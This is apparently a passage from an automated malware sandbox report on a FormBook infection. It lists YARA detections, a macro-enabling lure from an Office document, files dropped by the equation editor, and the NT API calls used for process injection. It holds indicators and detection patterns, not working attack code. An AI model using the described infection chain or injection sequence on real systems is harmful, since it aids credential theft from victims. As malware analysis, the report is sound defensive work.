          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: wlanext.exe, 00000007.00000002.2373223136.0000000002622000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: wlanext.exe, 00000007.00000002.2373223136.0000000002622000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: wlanext.exe, 00000007.00000002.2373223136.0000000002622000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 . . 29 30 " " " " " 31 0 0 0
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181AA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041825C NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182DA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00931148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00931930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00931D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C67C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B67C2 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FB0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FAFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_000981AA NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009825C NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_000982DA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E3632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E367C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E36332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E367C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00318810
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031C818
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031B870
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00311842
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00313138
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031A198
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00312241
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031CAD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00310470
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00319D68
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00319600
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00310FC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00315130
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00315140
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003131BC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003131FC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031AAE0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00315339
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00315348
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003193AC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031E468
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00311CC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0031353F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00319D58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003155B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00314DA8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003135F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003155C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003197BE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00315790
          Source: C:\Users\Public\vbc.exeCode function: 4_2_02185C38
          Source: C:\Users\Public\vbc.exeCode function: 4_2_021891F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040102F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CD28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CE77
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00943040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BD06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009663DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00942305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00947353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00975485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00951489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00986540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00944680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009757C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009429B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009569FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009F3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00967B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00972E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009B2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C67C7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C5062
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C08F9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C0902
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C32FF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C3302
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C1362
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000C75B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B67C7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B5062
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B08F9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B32FF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B0902
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B3302
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B1362
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002B75B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02061238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FBE0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0200A37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FD905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_020663BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC3040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FED005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FE63DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FBF3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0203D06D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC7353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC2305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FBE2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FDC5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02062622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0200A634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FD1489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FF5485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FFD47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0204579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0204443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FF57C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FCC7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FCE6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02006540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC4680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FD69FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC29B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02073A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FE286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FCC85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0206CBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0204DBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FBFBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0205F8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FE7B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0204394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02045955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0206098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FCCD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FF0D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0205CFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02032FDC
